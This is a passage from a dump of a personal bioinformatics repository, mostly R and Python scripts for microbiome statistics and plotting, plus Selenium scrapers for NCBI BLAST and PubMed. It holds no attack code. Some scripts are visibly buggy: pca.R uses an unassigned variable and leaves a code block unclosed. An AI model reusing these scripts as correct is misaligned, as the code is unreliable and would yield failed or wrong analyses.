character!\\n')\n\tparser.print_help()\n\texit()\noutdir = args.outdir if args.outdir else '.'\n\nif abdfile:\n\tname = os.path.basename(abdfile)\n#\tdt = pd.read_table(abdfile, header=0, index_col=0)\n\tdt = pd.read_table(abdfile, header=0)\n\tdt.set_index(dt.columns[0], inplace=True) # for gene profile\n\tlst = splitlist.split(':') #two element \n\tif len(lst) > 1:\n\t\tmatch = re.search('.*-(.*)',lst[0])\n\t\toutfile = outdir + '/' + match.group(1) + '_' + name\n\t\twith open(outfile,'w') as out:\n\t\t\tdt_temp = dt.loc[:,dt.columns.str.contains(lst[0])|dt.columns.str.contains(lst[1])]\n\t\t\tdt_temp = dt_temp.loc[(dt_temp != 0).sum(axis=1) != 0,:]\n\t\t\tdt_temp.to_csv(outfile, sep='\\t')\n\telse:\n\t\texpose_dt = dt.loc[:,dt.columns.str.contains('-a') == False] #暂且写成这样..\n\t\trecovery_dt = dt.loc[:,dt.columns.str.contains('-a')]\n\t\texpose_dt.to_csv('expose_'+name, sep='\\t')\n\t\trecovery_dt.to_csv('recovery_'+name, sep='\\t')\t\t\n\nif groupfile:\n\tname = os.path.basename(groupfile)\n\tgroup = pd.read_table(groupfile, header=0, index_col=0)\n\tlst = splitlist.split(':')\n\toutfile = outdir + '/' + match.group(1) + '_' + name\n\twith open(outfile,'w') as out:\n\t\tgroup_temp = group.loc[group.index.str.contains(lst[0])|group.index.str.contains(lst[1]),:]\n\t\tgroup_temp.to_csv(outfile, sep='\\t')\n"
},
{
"alpha_fraction": 0.6161757707595825,
"alphanum_fraction": 0.6503039002418518,
"avg_line_length": 41.779998779296875,
"blob_id": "3973d85ccec722bfd4211026e17d44300fec34f6",
"content_id": "30009774dbd09bd34459d78e9ee2c14274b434fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2197,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 50,
"path": "/rat/diff/FB_boxplot.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#Rscript FB_boxplot.R F_B_ratio_boxplot.txt(在主目录的 data 文件夹里) E-liquid:Cigarette 487eb3:d2382c\nlibrary(ggplot2)\nlibrary(ggpubr)\nArgs = commandArgs(TRUE)\nfb_table = Args[1] #F_B_ratio_boxplot.txt\ngroup_list = Args[2] #E-liquid:Cigarette\ncolor_list = Args[3] #487eb3:d2382c 颜色的顺序要和上边的组别一致\n\nlegend_list = unlist(strsplit(group_list, \":\"))\ncolor_var = unlist(strsplit(color_list,\":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\nfilename_prefix = gsub(\":\",\"_\", group_list)\n\ndt = read.table(fb_table, header = T, sep =\"\\t\")\n\n#差异计算\nFB_diff = compare_means(FB~subgroup, data=dt, group.by = \"group\")\nwrite.table(FB_diff,file = paste(filename_prefix,\"_FB_Diffresult.txt\", sep=\"\"),sep = \"\\t\",quote = F,row.names = F)\n\ngroup_list = c('E-liquid', 'Cigarette')\ndt$Subgroup = factor(dt$subgroup, levels=legend_list)\nPlot = ggplot(dt,aes(x = group, y = log10(FB))) +\ngeom_boxplot(aes(color = Subgroup),fatten = 1, lwd = 0.5, outlier.size = 0.5, position = position_dodge(0.9)) +\nlabs(x ='', y = expression(F/B~ratio~(log['10'])), fill = '', color = '', size = 10 ) +\nscale_color_manual(values = color_var) + \ntheme(\n axis.text = element_text(colour = 'black', size = 10),\n# axis.text.x = element_text(hjust = 1, angle = 45), #phylum\n# axis.text.x = element_text(hjust = 1, face = 'italic', angle = 45), #genus\n# axis.text.x = element_text(hjust = 1, face = 'italic', angle = 60), #species\n axis.title.y = element_text(size = 10, face = 'bold'),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.position = c(0,0),\n legend.justification = c(0,0),\n legend.key = element_blank(),\n legend.text = element_text(size = 10),\n legend.key.width = unit(0.2, 'in'),\n legend.key.height = unit(0.2, 'in'),\n legend.background = element_blank(),\n panel.background = element_blank(),\n plot.margin = unit(c(0.2, 0.2, 0.1, 0.2), 'in')\n) + stat_compare_means(label = \"p.signif\")\n\n#plot\npostscript(paste(filename_prefix,\"_FB_boxplot.eps\",sep=\"\"), width = 6, height=4)\nPlot\ndev.off()\n#png(paste(filename_prefix,\"_FB_boxplot.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\")\n#Plot\n#dev.off()\n"
},
{
"alpha_fraction": 0.6877005100250244,
"alphanum_fraction": 0.6983957290649414,
"avg_line_length": 48.21052551269531,
"blob_id": "af06efad628efddecf13cb6719ced2610a215115",
"content_id": "19fe229734306ad279a5faab32cb8cd1d2899f13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1089,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 19,
"path": "/adonis.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/R\n#eg: Rscript adonis.R expose_abd.txt Sample_information_detail.txt Group\nlibrary(vegan)\nArgs <- commandArgs(TRUE)\nabd_table = Args[1] # 丰度文件 expose_abd.txt \ngroup_table = Args[2] # 分组文件 Sample_information_detail.txt \nvar = Args[3] # 需要做检验的组别名字 Group 或者 Sex 之类的\n\noutfile = paste(var,\"Adonis.txt\", sep=\"\") \ndt = read.table(abd_table, header=T, row.names=1, sep=\"\\t\", check.names=F)\ngroup <- read.table(group_table, header=T, check.name = F)\nDT <- t(dt)\nDT.mat = sqrt(DT)\nDT.dist <- vegdist(DT.mat, method=\"bray\")\nset.seed(1)\nrun <- paste(\"DT.div = adonis2(formula=DT.dist~\",var,\",data=group,permutations=9999)\",sep=\"\")\neval(parse(text = run)) # 首先使用 parse() 函数将字符串转化为表达式(expression),再使用 eval() 函数对表达式求解\nwrite.table(DT.div, file=outfile, quote = F, sep=\"\\t\", col.names=NA) #保持第一行第一列的空白位置\n#write.table(data.frame(\"Name\"=rownames(DT.div),DT.div,check.names=F), file=outfile, quote = F, sep=\"\\t\", row.names=F) #或者给第一行第一列的位置赋值\n"
},
{
"alpha_fraction": 0.5810219049453735,
"alphanum_fraction": 0.5912408828735352,
"avg_line_length": 37.05555725097656,
"blob_id": "c38dea6707d180f171adfc5ae127c5f22434d303",
"content_id": "81db80fe6d734400d2583c2d9bd322d2da367436",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 803,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 18,
"path": "/Phenotype/cat_result.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 接上一个差异检验的脚本 cat_diff.R ,处理其结果,整理成发表文章用的格式,略加改动就可以;\n\nimport os\ngroup = ['NS','FS','CS'] # 组名\n\nwith open('diff_results.xls', 'r') as IN, open('Final_result.xls','w') as out:\n\thead = IN.readline().strip('\\n').split('\\t')\n\tprint('\\t'.join([head[0], '\\t'.join(group), head[1]]), file = out)\n\tfor line in IN:\n\t\tline = line.strip('\\n').split('\\t')\n\t\toutline = '\\t'.join([line[0] + ',n(%)', '\\t'*len(group)]) \n\t\tprint(outline + '%.2e' % float(line[1]), file = out) #格式化输出,科学计数法,保留两位小数点... \n\t\twith open(line[0] + '_information.xls', 'r') as indice:\n\t\t\tindice.readline()\n\t\t\tfor line in indice:\n\t\t\t\tline = line.strip('\\n')\n\t\t\t\tprint(line, file = out)\n\t#\tos.remove(line[0] + '_information.xls')\n"
},
{
"alpha_fraction": 0.6294389963150024,
"alphanum_fraction": 0.6407617330551147,
"avg_line_length": 36.36538314819336,
"blob_id": "2b5991b1fb0f82727ab5559de389df842cd0f8b6",
"content_id": "ba67334395941dcdeed70a2621226af6b06395d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2019,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 52,
"path": "/爬虫/blast_crawler.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver import ActionChains \nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.keys import Keys #这个没有用上\nimport time,os,re\nbrowser = webdriver.Chrome()\nurl = 'https://blast.ncbi.nlm.nih.gov/Blast.cgi?PROGRAM=blastn&PAGE_TYPE=BlastSearch&LINK_LOC=blasthome'\nbrowser.get(url)\notu_seq = 'filter_OTU_final.fasta' # 输入文件\nseq = ''\n#otu_num = 0\nwith open(otu_seq, 'r') as IN:\n for line in IN:\n seq = seq + line\n# otu_num += 1\nbrowser.find_element_by_id(\"seq\").send_keys(seq)\ntime.sleep(60) # 视网速而定...\nprint(\"sequence input done~\")\nbrowser.find_element_by_xpath('//*[@class=\"blastbutton\"]').click()\ntime.sleep(180) # 视网速而定...\nprint('blast done!')\nout = open('align_result.xls', 'w')\nselect = Select(browser.find_element_by_id('queryList'))\nnumber = len(select.options)\nfor index in range(0, number):\n select = Select(browser.find_element_by_id('queryList'))\n otu_id = select.options[index].text\n print(otu_id)\n print('##' + otu_id, file = out)\n select.select_by_index(index)\n time.sleep(5)\n soup = BeautifulSoup(browser.page_source, \"html.parser\")\n table = soup.find(class_ = \"ui-ncbigrid-outer-div caption-exists\")\n raw_head = table.find(class_ = \"first\").get_text()\n raw_head = re.sub('\\n+','\\n', raw_head)\n header = '\\t'.join(raw_head.strip('\\n').split('\\n')[1:]) ##\n print(header, file = out)\n for results_number in range(1,11):\n raw_line = table.find(ind = results_number).get_text()\n raw_line = re.sub('\\n+','\\n', raw_line)\n # E value 和 identity 列错位\n temp = raw_line.strip('\\n').split('\\n')\n mismatch = temp[5]\n del temp[5]\n del temp[0]\n temp.insert(5,mismatch[:-6])\n temp.insert(6,mismatch[-6:])\n line = '\\t'.join(temp)\n print(line, file = out)\nout.close() ## 一定要关闭... 不然输出文件会不全....\n"
},
{
"alpha_fraction": 0.6111927032470703,
"alphanum_fraction": 0.6479033827781677,
"avg_line_length": 49.23770523071289,
"blob_id": "639f889b890b7ff0d34b47fc35a8188175dce4d2",
"content_id": "7325a467fcfb9398efaf3ff77bf5404632d7ae86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 6245,
"license_type": "no_license",
"max_line_length": 226,
"num_lines": 122,
"path": "/pca.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/Rscript \n#eg: Rscript pca.R expose_abd.txt Sample_information_detail.txt CK:E-liquid:Cigarette 67ab57:487eb3:d2382c \nArgs <- commandArgs(TRUE)\nabd_table = Args[1] # 丰度文件 expose_abd.txt\ngroup_table = Args[2] # 分组文件 Sample_information_detail.txt\ngroup_list = Args[3] # CK:E-liquid:Cigarette\ncolor_list = Args[4] # 67ab57:487eb3:d2382c\ndt = read.table(abd_table, header = T,sep = '\\t', row.names = 1, check.names = F, comment.char=\"\")\ngroup = read.table(group_table, header=T, sep=\"\\t\", row.names = 1, check.names = F,comment.char=\"\") \ncolor_var = unlist(strsplit(color_list, \":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\nlegend_list = unlist(strsplit(group_list, \":\"))\nfilename_prefix= gsub(\":\", \"_\", group_list)\n\nlibrary(ade4)\nlibrary(ggplot2)\n#dt_t = t(dt)\ndt_t = t(sqrt(dt)) # 原始数据预处理\ndt.dudi <- dudi.pca(dt_t,center=TRUE,scale=F,scannf=F,nf=4)\n#pca = cbind(dt.dudi$li,group)\nmerge(dt.dudi$li,group,by=\"row.names\") #原来的合并方式太危险啦\npca$Group = factor(pca$Group, levels=legend_list)\npc1 = round(100*dt.dudi$eig[1]/sum(dt.dudi$eig),2)\npc2 = round(100*dt.dudi$eig[2]/sum(dt.dudi$eig),2)\nxlab=paste(\"PC1(\",pc1,\"%)\",sep=\"\")\nylab=paste(\"PC2(\",pc2,\"%)\",sep=\"\")\npc = ggplot(pca,aes(x=Axis1,y=Axis2,col=Group,shape = Group)) + \n geom_point(size = 3) + \n theme_bw() + \n scale_color_manual(values = color_var) + \n labs(x=xlab,y=ylab) + \n theme(axis.text = element_text(colour = 'black', size = 10), axis.title = element_text(size = 12), \n panel.background = element_rect(colour = \"black\", size = 1),panel.grid =element_blank(), legend.key = element_blank(), \n legend.text = element_text(size = 10), legend.title = element_blank(), legend.position='none', plot.margin = unit(c(0.4, 0.3, 0.1, 0.1 ), 'in'))\n\n## PC1 & PC2 箱线图\nlibrary(ggpubr)\npc1_diff = compare_means(Axis1 ~ Group, pca, method = \"wilcox.test\") ## default wilcox.test\nwrite.table(pc1_diff,file = paste(filename_prefix,\"_pc1_Diffresult.txt\",sep=\"\"),sep = \"\\t\",quote = F,row.names = F)\ndiff_temp = as.data.frame(pc1_diff)\ndiff_temp = diff_temp[which(diff_temp$p < 0.05),]\nif (nrow(diff_temp) > 0 ) { # 增加所有差异检验不显著结果的处理\nmy_comparisons = list()\nfor (row in 1:nrow(diff_temp)) {\n diff_group <- as.character(diff_temp[row, c(2,3)])\n my_comparisons[[row]] = diff_group\n}\npc1 = ggplot(pca,aes(x=Group, y=Axis1,colour=Group)) + geom_boxplot()+stat_compare_means(comparisons= my_comparisons ,label = \"p.signif\", label.y = c(0.02,0.04,0.09) + max(pca$Axis1)) + scale_color_manual(values= color_var) +\n labs(x=\"\", y = \"PC1\") + scale_y_continuous(limits = c(min(pca$Axis1), max(pca$Axis1) + 0.1)) + \n theme(axis.text = element_text(colour = 'black', size = 8,),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.4,0.3, 0, 0), 'in'))\n} else {\npc1 = ggplot(pca,aes(x=Group, y=Axis1,colour=Group)) + geom_boxplot() + scale_color_manual(values= color_var) +\n labs(x=\"\", y = \"PC1\") +\n theme(axis.text = element_text(colour = 'black', size = 8,),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin 
= unit(c(0.4,0.3, 0, 0), 'in'))\n \npc2_diff = compare_means(Axis2 ~ Group, pca, method = \"wilcox.test\") \nwrite.table(pc2_diff,file = paste(filename_prefix,\"_pc2_Diffresult.txt\",sep=\"\"),sep = \"\\t\",quote = F,row.names = F)\ndiff_temp = as.data.frame(pc2_diff)\ndiff_temp = diff_temp[which(diff_temp$p < 0.05),]\nif (nrow(diff_temp) > 0 ) { # 同上\nmy_comparisons = list()\nfor (row in 1:nrow(diff_temp)) {\n diff_group <- as.character(diff_temp[row, c(2,3)])\n my_comparisons[[row]] = diff_group\n}\npc2 = ggplot(pca,aes(x=Group, y=Axis2,colour=Group)) + geom_boxplot()+ stat_compare_means(comparisons= my_comparisons ,label = \"p.signif\", label.y = c(0.02,0.04,0.09) + max(pca$Axis2)) + scale_color_manual(values= color_var) +\n labs(x=\"\", y = \"PC2\") + scale_y_continuous(limits = c(min(pca$Axis2), max(pca$Axis2) + 0.1)) + \n theme(axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0, 0.3, 0.1, 0), 'in'))\n} else {\npc2 = ggplot(pca,aes(x=Group, y=Axis2,colour=Group)) + geom_boxplot() + scale_color_manual(values= color_var) +\n labs(x=\"\", y = \"PC2\") +\n theme(axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0, 0.3, 0.1, 0), 'in'))\n#output\npdf(paste(filename_prefix,\"_PCA.pdf\",sep=\"\"),width=6,height=4)\npng(paste(filename_prefix,\"_PCA.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\") # 增加 png 的输出, 方便做 PPT。。。\nlibrary(grid)\nlibrary(\"gridBase\")\nplot.new()\nplotlayout <- grid.layout(nrow=2,ncol=3)\nvp1 <- viewport(layout.pos.col=c(1,2),layout.pos.row=c(1,2))\nvp2 <- viewport(layout.pos.col=3,layout.pos.row=1)\nvp3 <- viewport(layout.pos.col=3,layout.pos.row=2)\npushViewport(viewport(layout=plotlayout))\npushViewport(vp1)\npar(new=TRUE,fig=gridFIG(),mai=c(1.1,1,0.3,0.2))\nprint(pc,newpage=FALSE)\npopViewport()\n\npushViewport(vp2)\npar(new=TRUE,fig=gridFIG())\nprint(pc1,newpage=FALSE)\npopViewport()\n\npushViewport(vp3)\npar(new=TRUE,fig=gridFIG())\nprint(pc2,newpage=FALSE)\npopViewport()\ndev.off()\n"
},
{
"alpha_fraction": 0.7550504803657532,
"alphanum_fraction": 0.7601010203361511,
"avg_line_length": 55.57143020629883,
"blob_id": "9682281a1e3fa76e6a9f774ded3924308bae56d7",
"content_id": "f87a8870355edc0f3c01ce430865c4f8459dcc7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 484,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 7,
"path": "/heatmap.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 根据计算出来的 braycurtis 距离矩阵,画热图,并且进行按照分组进行标识\n\nlibrary('pheatmap')\ndt = read.table('braycurtis.txt', header=T)\nexpose = read.table('expose_diversity', header=T, check.names=FALSE)\nexpose_group = read.table('Sample_information_detail.txt', header=T, row.names=1, comment.char='', check.names=F) #分组信息,行名需是距离矩阵的列名 \npheatmap(expose, fontsize=9,annotation_col=expose_group, filename='expose_bray.pdf')\n"
},
{
"alpha_fraction": 0.6179159283638,
"alphanum_fraction": 0.619744062423706,
"avg_line_length": 38.07143020629883,
"blob_id": "096a0e357b65b9772ad903952f0e0e8a947f9875",
"content_id": "ef0e3c5dca985c7c87dc95b9434dfee8f610f3d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 567,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 14,
"path": "/braycurtis.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "from scipy.spatial import distance\nimport pandas as pd\ndt = pd.read_table('GeneCatalog_profile.xls')\n#dt.index = dt['geneID']\n#dt.drop(['geneID'], axis=1, inplace=True) 忘记了为啥加上这两行....\nwith open('braycurtis.txt', 'w') as bray:\n print('\\t' + '\\t'.join(dt.columns.values), file = bray)\n for first in dt.columns.values:\n lst = list()\n lst.append(first)\n for second in dt.columns.values:\n dis = distance.braycurtis(dt[first], dt[second])\n lst.append(str(dis))\n print('\\t'.join(lst), file=bray)\n"
},
{
"alpha_fraction": 0.5992210507392883,
"alphanum_fraction": 0.6099318265914917,
"avg_line_length": 34.41379165649414,
"blob_id": "6fac4ecfb3d3a2ebf436bf8a782c7dfd62bb4fa2",
"content_id": "df2f8a81d2635671bebc8656bbfa7e8a23cbe687",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5355,
"license_type": "no_license",
"max_line_length": 231,
"num_lines": 145,
"path": "/Paper_information/advanced_paper_informational.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver import ActionChains \nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.keys import Keys \nimport time,os,re\n\n# set pars\nimport argparse,re,os,math,glob\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nCrawl the information of paper... You should provide the DOI or a file for DOI (line breaks). \nExample: python3 advanced_paper_informational.py -l 10.1016/S0140-6736(19)32319-0\n python3 advanced_paper_informational.py -f doi_file\nTo be continued.\n------------------'''\n)\nparser.add_argument('-l','--onedoi', nargs='?', help = \"DOI information.\")\nparser.add_argument('-f','--filelist',nargs='?', help = \"the DOI information list file.\")\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs = parser.parse_args()\nvar = args.onedoi\nfiles = args.filelist \n\n## define the user(linux) and abbreviatio for print \nimport re\nDict = {'zhangSan':'ZS', 'LiSi':'LS'}\nimport os\nuser_full = os.popen('whoami').readlines()[0].strip()\nif user_full in Dict:\n user = Dict[user_full]\nelse:\n user = user_full\n\n# doi information \ndoi_list = list()\nif var:\n\tdoi_list.append('DOI: ' + var)\nif files:\n\twith open(files, 'r') as IN:\n\t\tInput = IN.readlines()\n\t\tdoi_list = ['DOI: ' + x.strip() for x in Input]\t\n\n# out file \nout = open('paper_information.xls', 'w')\n\n## scraping \nprint(user_full + ' is crawling... \\nThe warning information appeared later does not matter. \\nIt may need some time, please wait patiently:)\\nIf there is no output for a long long time, you should stop it and try to run again.\\n')\n\nbrowser = webdriver.PhantomJS() \nurl = 'https://pubmed.ncbi.nlm.nih.gov/'\n \n# 杂志名称全称\nj_name = dict()\nwith open('files/J_Medline.txt', 'r') as IN:\n for line in IN:\n line = line.strip('\\n')\n if line.startswith('JournalTitle'):\n if re.search(' \\(.*\\)', line):\n match = re.search('JournalTitle: (.*) \\(.*\\)', line) \n else:\n match = re.search('JournalTitle: (.*)', line) # ncbi 是缩写,然后影响因子是全称,所以得找到这个信息\n #发现有带(London, England)这种信息的。。。。\n full = match.group(1)\n if line.startswith('MedAbbr'):\n match = re.search('MedAbbr: (.*)', line)\n abbr = match.group(1)\n if line.startswith('NlmId'):\n j_name[abbr] = full\n \n# 杂志 IF\nimport pandas as pd\ndt = pd.read_table('files/IF_2019.txt', index_col = 1)\nIF_dict = dt['Journal Impact Factor'].to_dict()\n\nfor x in doi_list:\n DOI = x\n browser.get(url)\n print(\"\\nThe pubmed url is opening correctly.\\n\")\n time.sleep(3)\n try:\n browser.find_element_by_xpath('//*[@name=\"term\"]').send_keys(x)\n time.sleep(2)\n except NoSuchElementException:\n print('AO, something wrong...')\n\n browser.find_element_by_xpath('//*[@class=\"search-btn\"]').click()\n time.sleep(2)\n print(\"\\nThe page for paper \" + x + \" is opiening correctly.\\n\")\n soup = BeautifulSoup(browser.page_source, \"html.parser\")\n \n # journal name abbr\n journal = soup.find(id = \"full-view-journal-trigger\").get_text().strip()\n\n # title\n title = soup.find(class_ = \"heading-title\").get_text().strip()\n \n # IF\n for x in IF_dict:\n match = re.search('^' + j_name[journal] + '$', x, flags=re.IGNORECASE) # 有的名字包含其他杂志的全称... 
\n if match:\n IF = IF_dict[x]\n journal_name = j_name[journal]\n else:\n match = re.search('^' + j_name[journal].replace('.','') + '$', x, flags=re.IGNORECASE) # 有的杂志匹配出来的全称多了个点:Nature reviews. Immunology\n if match:\n journal_name = j_name[journal].replace('.','')\n IF = IF_dict[x]\n\n\n # 发表时间\n if soup.find(class_ = \"secondary-date\"):\n p_time = soup.find(class_ = \"secondary-date\").get_text().strip().strip('Epub ').strip('.')\n else:\n p_time = soup.find(class_ = \"cit\").get_text().split(\";\")[0]\n\n # PMID \n PMID = soup.find(class_ = \"current-id\").get_text()\n\n\n #原文链接\n doi_info = soup.find(class_ = \"identifier doi\") \n http = doi_info.find(class_ = \"id-link\")['href'] # 增加这一步是因为偶尔会出现 NCBI 的链接\n\n # 一作和通讯\n authors = soup.find(class_ = \"authors-list\").get_text().strip().replace(u'\\xa0', '').replace(u'\\xa0', '').replace(' ', '')\n author_list = re.sub('\\n\\w*', '', authors).split(',')\n first_author = author_list[0]\n corresponding_author = author_list[-1]\n\n # 第一单位\n affiliations = soup.find(class_ = \"affiliations\").get_text().strip()\n affiliations = re.sub('[ ]+', ' ', affiliations)\n affiliations_list = re.sub('[\\n]{2,}', '', affiliations).split('\\n')\n first_affiliation = affiliations_list[1].lstrip(' 0123456789')\n\n line = '\\t'.join([user, title, journal_name, p_time.replace('.', ''), PMID, DOI, http, IF, first_author, corresponding_author, first_affiliation])\n print(line, file = out)\n print('\\n' + line + '\\n')\n \nout.close()\nprint(\"\\nDone!, the output is paper_information.xls.\\n\")\n"
},
{
"alpha_fraction": 0.6222509741783142,
"alphanum_fraction": 0.6261319518089294,
"avg_line_length": 19.891891479492188,
"blob_id": "1223eac6c196a34a693599e572a619e5af5196c8",
"content_id": "2121d94f602acdb5b91c4145ecba3e2d6d4d62bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 869,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 37,
"path": "/fasta_split.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#按照 fasta 的 ID 和序列切分 fasta 文件,按 ID 输出想要的 fasta 序列(注释掉)\n#! /usr/bin/python3\nimport os,sys\n## write the fasta file into directory\n#otu_ID = sys.argv[1]\ninputFile = sys.argv[1] # fasta 文件\nbasename = os.path.basename(inputFile)\noutFile = 'filter_' + basename\nfasta_dict = dict()\nwith open (inputFile, 'r') as IN:\n\tseq = ''\n\tkey = ''\n\tfor line in IN:\n\t\tif line.startswith('>'):\n\t\t\tfasta_dict[key] = seq\n\t\t\tkey = line\n\t\t\tseq = ''\n\t\telse:\n\t\t\tseq = seq + line\n\n\tfasta_dict[key] = seq\n\ndel fasta_dict['']\n\n##按照键值对输出 fasta 的序列,可以自己拿个小文件测试\nfor key in fasta_dict:\n\tprint (key + '==>' + fasta_dict[key]) \n\n'''\n#process otu ID file\nwith open(otu_ID, 'r') as IN, open(outFile, 'w') as out:\n\tfor line in IN:\n\t\tID = '>' + line\n\t\tif ID in fasta_dict:\n\t\t\tout.write(ID + fasta_dict[ID])\n\n'''\n"
},
{
"alpha_fraction": 0.5530410408973694,
"alphanum_fraction": 0.6760962009429932,
"avg_line_length": 53.153846740722656,
"blob_id": "0d83ae97632351304090cbc1276685b6ae9d22cb",
"content_id": "bccd9918bde2909360d721ffb28ad40ce202b6cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 953,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 13,
"path": "/permutation.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 置换检验的一个例子,来自参考链接\na<-c(24,43,58,67,61,44,67,49,59,52,62,50,42,43,65,26,33,41,19,54,42,20,17,60,37,42,55,28) #生成 28 个数据\ngroup<-factor(c(rep(\"A\",12),rep(\"B\",16))) # A,B 分别重复 12,16 次 \ndata<-data.frame(group,a) #合并成数据框\nfind.mean<-function(x){ #计算 A,B 标签对应数据的均值差\nmean(x[group==\"A\",2])-mean(x[group==\"B\",2]) \n}\nmean_obs = find.mean(data) #计算实际数据的均值差\nresults<-replicate(999,find.mean(data.frame(group,sample(data[,2])))) #随机打乱 28 个数据,赋予标签 A,B,计算对应的均值差,重复 999 次\np.value<-length(results[results>mean(data[group==\"A\",2])-mean(data[group==\"B\",2])])/1000 #统计大于实际均值差的均值比例;\nhist(results,breaks=20,prob=TRUE) #画图\nlines(density(results)) #加拟合线\npoints(mean_obs, p.value, pch=16) # 画出实际均值差为横坐标,对应 P 值为纵坐标的实心点\n \n"
},
{
"alpha_fraction": 0.6057401895523071,
"alphanum_fraction": 0.6193353533744812,
"avg_line_length": 26.58333396911621,
"blob_id": "b6b1309c276071d579b704cca47878cdd47a82fe",
"content_id": "86f15b0e3f3a5b8a7b7c96e0dbf3a1a790f6ad74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 680,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 24,
"path": "/Maaslin/maaslin_run.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "library(getopt)\nspec <- matrix(c(\n 'help','h',0,'logical','',\n 'input','i',1,'character','the tsv file',\n 'config','c',1,'character','the config file',\n 'outdir','o',2,'character','output dir'\n),ncol=5,byrow=TRUE)\nopt <- getopt(spec)\nif( !is.null(opt$help)) {\n cat(getopt(spec, usage=TRUE));\n q(status=1);\n}\n\nif ( is.null(opt$input) | is.null(opt$config)) {\n\tprint('Please!') #翻译过来是求您了!\n\tcat(getopt(spec, usage=TRUE));\n\tq(status=1);\n}\n\ninput = opt$input\nconfig = opt$config\nif( is.null(opt$outdir) ) { outdir <- './'} else { outdir <- opt$outdir }\nlibrary(Maaslin)\nMaaslin(input, outdir, strInputConfig=config ,dMinAbd=0,dMinSamp = 0)\n"
},
{
"alpha_fraction": 0.5169141888618469,
"alphanum_fraction": 0.5878713130950928,
"avg_line_length": 82.55172729492188,
"blob_id": "5bae4d2523380e9cc9ce77993c55d1c7663ac119",
"content_id": "8b109878d18377bb866bddfc8f1f1c1f41cda35c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2446,
"license_type": "no_license",
"max_line_length": 259,
"num_lines": 29,
"path": "/CHD/heatmap.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
